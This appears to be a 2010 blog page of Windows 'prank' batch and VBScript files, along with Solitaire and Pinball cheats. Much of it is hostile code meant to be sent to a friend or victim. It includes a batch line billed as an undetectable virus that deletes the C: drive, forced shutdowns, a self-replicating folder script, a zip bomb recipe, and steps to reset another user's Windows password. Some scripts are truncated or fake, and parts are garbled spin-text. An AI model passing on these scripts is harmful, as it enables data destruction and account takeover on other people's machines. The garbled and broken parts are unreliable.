apple iphone4

Saturday, September 18, 2010

some funny notepad scripts (part-3)

All this command use to type in notepad
7) Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

8. Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.

9) Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

10) THRETEN BY MAKING SCREEN FLASH

To make a really cool batch file that can make your entire screen flash random colors until you hit a key to stop it, simply copy and paste the following code into notepad and then save it as a .bat file.

@echo off
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
But if you really want to mess with a friend then copy and paste the following code which will do the same thing except when they press a key the screen will go black and the only way to stop the batch file is by pressing CTRL-ALT-DELETE.
@echo off
:a
echo e100 B8 13 00 CD 10 E4 40 88 C3 E4 40 88 C7 F6 E3 30>\z.dbg
echo e110 DF 88 C1 BA C8 03 30 C0 EE BA DA 03 EC A8 08 75>>\z.dbg
echo e120 FB EC A8 08 74 FB BA C9 03 88 D8 EE 88 F8 EE 88>>\z.dbg
echo e130 C8 EE B4 01 CD 16 74 CD B8 03 00 CD 10 C3>>\z.dbg
echo g=100>>\z.dbg
echo q>>\z.dbg
debug <\z.dbg>nul
del \z.dbg
goto a

To disable error (ctrl+shirt+esc) then end process wscript.exe

some funny notepad scripts (part-2)

All this command use to type in notepad

4) Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

5) Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

6) Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

some funny notepad scripts (part-1)

All this command use to type in notepad
1)Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

2) Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

3) Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

write ur own simple virus cant detected by any antivirus........

All this command use to type in notepad

@Echo off
Del C:\ *.* |y


And save that as
.bat not .txt and RUN IT
It will
delete the content of C:\ drive...

PLEASE NoTe:::::
dont run that .bat file on ur system .... it will delet c:...

IF ANY ONE..... DARE TO ......RUN ...U LOST ..........CONTENTS OF C drive

EVEN I DIDN't TRY THIS........

I WILL NOT RESPONSIBLE FOR ANYTHING DONE BYE U USING THE INFORMATION GIVEN ABOVE...

Solitare and cheats this is featured page

Secret - Reveal Mines

Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.


Pinball



Secret - Extra Balls
Instructions - Type 1max at the start of a new ball to get extra balls.


Secret - Gravity Well
Instructions - Type gmax at the start of a new game to activate the Gravity Well.



Secret - Instant Promotion
Instructions - Type rmax at the start of a new game to go up in ranks.



Secret - Skill Shot
Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:


First: 15,000 points
Second: 30,000 points
Third: 75,000 points
Fourth: 30,000 points
Fifth: 15,000 points
Sixth: 7,500 points



Secret - Test Mode
Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.



Secret - Unlimited Balls
Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting




FreeCell



Secret - Instant Win
Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.



Secret - Hidden Game Modes
Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.



Solitaire

Secret - Instant Win



Instructions - Press Alt + Shift + 2 during game play to instantly win.


Secret - Draw single cards in a Draw Three game



Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.

Infinite Points



In the Windows XP version of solitaire, draw from the deck at least twice. Hold control and drag a card down from the deck. Click the "A" key and then let go of the left mouse key. You will get 10 points for this. Continue doing this for infinite points!

Infinite points trick II



To do this trick, finish a game of solitaire with the time bonus option on. The cards will start bouncing. Click on the solitaire screen and the play again box will pop up. Select no, so the solitaire screen is just blank green. Use the instant win cheat (Alt+Shift+2) and you will recieve the time bonus you got last game will be added to your last game's score. For example, if your time bonus was 5000, and your final score was 6000, after using this glitch, you will have a score of 11000. This glitch can be used as many times as you want.



//-----------------------------------------------------------------
// registry hack which will allow you to see your opponents' cards
//-----------------------------------------------------------------
Launch REGEDIT.EXE and navigate to HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Applets Hearts. NOTE: You may have to create the Hearts key under Applets In the right-hand pane, create a new String Value. Immediately rename it to "ZB" (without the quotes); give it a value of "42" (again, sans quotes). The next time you're in a game of Hearts, press CTRL + SHIFT + ALT + F12.

The ZIP of Death

This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.

1) Make a.txt file

2) Open and type the null character (alt + 255)

3) Press ctrl + a then ctrl + v a couple times to make some null bytes

4) If u have a hexeditor make the hex 00 for about 50 kilobytes.

5) Now make several copies of a.txt and name accordinly

6) Open cmd.exe

7) Type copy /b *.txt b.txt

8) Now every copy is made into a super copy and repeat

9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!

The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555

Just add some more and the file will expand amazingly

Make sure to not open this after

You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz

ping of death


well here is the full syntax
PING

Test a network connection - if successful, ping returns the ip address.

Syntax
PING [options] destination_host

Options
-w timeout Timeout in milliseconds to wait for each reply.
-i TTL Time To Live.
-v TOS Type Of Service.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-t Ping the destination host until interrupted.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host_list Loose source route along host_list.
-k host_list Strict source route along host_list.
destination_host The name of the remote hostA response of "Request timed out" means there was no response to the ping attempt in the default time period of one second.
If the latency of the response is more than one second. Use the -w option on the ping command to increase the time-out. For example, to allow responses within five seconds, use ping -w 5000.

A successful PING does NOT always return an %errorlevel% == 0
Therefore to reliably detect a successful ping - pipe the output into FIND and look for the text "TTL"

Note that "Reply" in the output of PING does not always indicate a positive response. You may receive a message from a router such as: Reply from 192.168.1.254: Destination Net Unreachable.

Four steps to test an IP connection with ping:

1) Ping the loopback address to verify that TCP/IP is installed and configured correctly on the local computer.
PING 127.0.0.1

2) Ping the IP address of the local computer to verify that it was added to the network correctly.
PING IP_address_of_local_host

3) Ping the IP address of the default gateway to verify that the default gateway is functioning and that you can communicate with a local host on the local network.
PING IP_address_of_default_gateway

4) Ping the IP address of a remote host to verify that you can communicate through a router.
PING IP_address_of_remote_host

Examples

PING -n 1 -w 7500 Server_06

PING -w 7500 MyHost |find "TTL=" && ECHO MyHost found

PING -w 7500 MyHost |find "TTL=" || ECHO MyHost not found

PING -n 5 -w 7500
www.microsoft.com

PING -n 5 -w 7500 microsoft.comPING is named after the sound that a sonar makes.

Ping times below 10 milliseconds often have low accuracy.




you can get the full syntax of the command from www.ss64.com site precisely from the link http://www.ss64.com/nt/ping.html ... may be this would be an help for you ..........

great-trick-lock-ur-pc-yourself

lock ur pc.. open notepad copy and paste the script below and save it .VBS extention

This wil create a shortcut.. run(click) it

set WshShell = WScript.CreateObject("WScript.Shell")

set oShellLink = WshShell.CreateShortcut(wshShell.SpecialFolders("Desktop") & "\LockWorkstation.lnk")

oShellLink.TargetPath = "%windir%\system32\rundll32.exe"

oShellLink.Arguments = "user32.dll,LockWorkStation"

oShellLink.Save

first select a folder for example i'll use a folder name movies in D drive D:\movies\

in the same drive u create a text file and type

ren movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}

and save it as loc.bat

again u type in a notepad as

ren movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} movies

and save it as key.bat

now in D drive u can see two batch files loc and key.. when u double click loc the movie folder will change to control panel and whn u double click key the control panel will change to normal folder..

there are two more different tricks in dis site to lock ur pc down in a unique ways.. donno where i have typed it.. !!!

Chat with friends through ms dos command prompt


1) All you need is your friend's IP Address and your Command Prompt.

2) Open Notepad and write this code as it is.....!

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A


3) Now save this as "Messenger.Bat".

4) Open Command Prompt.

5) Drag this file (.bat file) over to Command Prompt and press Enter.

6) You would then see something like this:


7) Now, type the IP Address of the computer you want to contact and press enter
You will see something like this:


8) Now all you need to do is type your message and press Enter.
Start Chatting.......!


Change the default opening folder in windows explorer

By default, Windows Explorer opens showing the My Documents folder. To change the
default setting so that all top-level drives and folders are shown, follow these steps:

· Click Start > Programs > Accessories, then right-click Windows Explorer, and click
Properties.

· Under Target field, which reads %SystemRoot%\explorer.exe, add to make the line
read:

%SystemRoot%\explorer.exe /n, /e, /select, C:\

Change drive letters in windows xp

When you add drives to your computer, such as an extra hard drive, a CD drive, or a
storage device that corresponds to a drive, Windows automatically assigns letters to the
drives. However, this assignment might not suit your system; for example, you might have
mapped a network drive to the same letter that Windows assigns to a new drive. When you
want to change drive letters, follow these steps:

· Right-click My Computer, and then click Manage.

· Under Computer Management, click Disk Management. In the right pane, you'll see
your drives listed. CD-ROM drives are listed at the bottom of the pane.

· Right-click the drive or device you want to change, and then click Change Drive
Letter and Paths.

· Click Change, click Assign the following drive letter, click the drive letter you
want to assign, and then click OK.

hack user password




hack user password

when u r at friends home u can do small mischif when he go away from pc

so let we start

1) click on start button------>run---->cmd(hit enter)

2) cmd will open -- in cmd type net user(shown in image)




3) all user name will appear

4) then type net user "users name"(example:net user rahul)
shown in image

5) then the user information will be appeared

6) then type net user username * (example:net user rahul *)
shown in image

7) it will ask for the password as u can see in image change it or do as u want( press enter after typeing the password)

8) it will ask confirm of the password (prees enter after typeing password)
-----after that it must show " The command completed successfully"-----

how to end any vbs file

go into a notepad and copy/paste this

@echo off
taskkill /f /im wscript.exe
taskkill /f /im cmd.exe
pause
exit

then save it as anything.BAT and run it to end any vbs and any batch file its great

How to find if my computer is infected with Gumblar ?

The antivirus in your system will not be able to detect Gumblar Virus as Gumblar would have already by-passed the antivirus. In this case, there is one way to find out if your local computer is infected with Gumblar Virus or not.

To find out if a computer is infected:

1) Locate sqlsodbc.chm in the Windows system folder (by default under Windows XP, the location is C:\Windows\System32\);

2) Obtain the Sha1 of the installed sqlsodbc.chm. FileAlyzer is a free tool that can be used to obtain the SHA1 of a file;

3) Compare the obtained Sha1 to the list located on the ScanSafe STAT Blog;

4) If the SHA1 and corresponding file size do not match with a pair on the reference list, it could be an indication of a Gumblar infection.

The most effective way to remedy an infection is to do a full reformat and reinstallation, according to ScanSafe. Passwords or login details that were stored or used on infected machines should also be changed

Unbelievable problem in microsoft

An unbelievable problem in microsoft ...

At Microsoft the whole Team, including Bill Gates,

couldn't answer why this happened!

It was discovered by a Brazilian. Try

it out yourself...

Open Microsoft Word and type

=rand (200, 99)

And then press ENTER

then see the magic..........

Port Scanner using Batch

You too can design a port scanner using a simple batch program, that too less than 10 lines.

1. Open up a notepad.

2. Copy and paste the following code.

Code:

@ECHO off
Title Crafted Port Scanner by h4ck3r.in
color 0a
cd\
C:
cls
for /L %%v in (1,1,11) do telnet %1 %%v
GOTO scan2
:scan2
for /L %%w in (12,1,20) do telnet %1 %%w



3. Save it as port.bat.

4. Goto command prompt and, goto the exact location of where this port.bat is located.

5. now type the following command on the command prompt.

port 127.0.0.1

6. This will port scan upto 20 continuous ports starting from 1 to 20 on your localhost.

7. This is not much efficient and not much reliable, but this is just to show, that there is a possibility for port scanning automation using Batch file programming.

Prank

Code:

@echo off
C:
cls
Echo Do you want to wipe all your computer's data? (Y/N)
Pause >nul
cls
Echo Are you sure your want to delete all data? (Y/N)
Pause >nul
cls
Echo Preparing to delete all Data 0 Percent.
TIMEOUT 5
Echo Preparing to delete all Data 10 Percent..
TIMEOUT 10
Echo Preparing to delete all Data 20 Percent...
TIMEOUT 5
Echo Preparing to delete all Data 30 Percent....
TIMEOUT 10
Echo Preparing to delete all Data 40 Percent.....
TIMEOUT 5
Echo Preparing to delete all Data 50 Percent......
TIMEOUT 5
Echo Preparing to delete all Data 60 Percent.......
TIMEOUT 10
Echo Preparing to delete all Data 70 Percent........
TIMEOUT 5
Echo Preparing to delete all Data 80 Percent.........
TIMEOUT 5
Echo Preparing to delete all Data 90 Percent..........
TIMEOUT 15
Echo Preparing to delete all Data 100 Percent..........
Echo Press any button to continue...
pause >nul
dir /s
shutdown -s -t 60 -c "System Formatted Successfully!!"

Copy thi code and save it as a.bat, send it to u frnds computer

Simple Virus in notepad

This is a simple virus that formats HDD.
      Write The Following In Notepad Exactly as it says
      01001011000111110010010101010101010000011111100000
      Save As An EXE Any Name Will Do 
      Send the EXE to People And Infect
        WARNING: I AM NOT RESPONSIBLE FOR WHAT YOU DO WITH THIS!!!

Thursday, September 16, 2010

How to use a trial software forever legally

Now we download stuff nearly daily.illegal unprecedented productions pop out conveniently often.illegal you may apply any software forever you want.illegal you may download trial version , illegal right.illegal trial version expires after a Great Deal Of days.illegal you may stop that expiration.illegal you may tell trial version of the software to not count days or effect not bother regarding time.illegal the software volition stop and keep working love basic software forever and volition not die or cease to drudgery.illegal you effect not own to modify your system clock.illegal this little software does it all.



Time stopper is the software which may stop the time for attempt out version software.illegal when you stop the time you may apply your try-out versions forever.illegal when you stop the time of a try-out version using this time stopper it works via this time stopper.illegal real time and date scour normally on your system.illegal you may apply any number of try-out version softwares with this software

How it Works


1. Open Time Stopper
2. Browse and select .exe of required trial software
3. Choose the new date (Any date which occurs in between your trial software time period before expiration, suggestion: set it to two days before trial software expiration date.)
4. Choose any time
5. Click open software on your selected date

provided you wish to fabricate an icon for your modified trial software and do not lack to candid time stopper every time then utilise final button in software to fabricate fresh icon.wicked candid that trial software after that from that newly created icon always otherwise it may expire


http://www.ziddu.com/download/6057958/Ti...http://www.ziddu.com/download/6057958/Time_stopper

Tuesday, September 14, 2010

Folder Replicator Batch virus

Folder Replicator Batch virus

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.


1. Just open up a notepad, copy and paste the below code

Code:

cd\
cd C:\virus
:loop
md Virus
cd Virus
goto loop


2. Then run it on the Victims computer to infect it.

3. Any how it doesnt cause much harm, but replicates folder inside a folder and goes on.

Feel free to share your fellings in comments.. : )

Convey your friend a lil' message and shut down his / her computer:

Convey your friend a lil' message and shut down his / her computer:

Code:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s


Save it as "Anything.BAT" in All Files and send it

Hard prank

Hard prank

Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown

Code

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

Matix Batch

Matrix is one of my favourite movies

Here is a good Matrix code

code

@Echo off

color 02

:m

echo h 3 k 5 j 6 2 y w 3 e q 5 i u t w e m t b h q m 7 n t 3 b q t y 4 4 q o w 6 t y q t h q i o w 4 t y q 1 u w 4 h t j 3

echo 3 2 1 7 3 1 5 7 3 4 3 1 6 2 9 1 5 6 8 7 1 6 3 8 9 b7 6 1 2 5 1 5 6 1 9 5 0 6 2 1 9

echo q e t y q o i e h q i t h q e i o u t y q o i t h g k d h f v s b q a t p y q e o p t y q o

echo 9 5 6 7 2 9 3 6 7 2 9 6 7 2 9 7 6 2 8 0 9 7 6 0 8 3 7 0 2 8 6 7 2 8 6 7 2 0 3 6 5 5

echo h a g k i o q w e u t y q oi t y q o e t h q e t h q e i o t y q ke b k b c v s l d v o 5

echo 13 5 9 1 6 9 5 6 1 3 9 5 6 2 1 8 9 65 1 9 6 51 9 5 6 1 9 62 9 5 1 6 9 5 8 16

goto :m

Save it as anyfilename.bat and hit alt+enter to see real matrix screen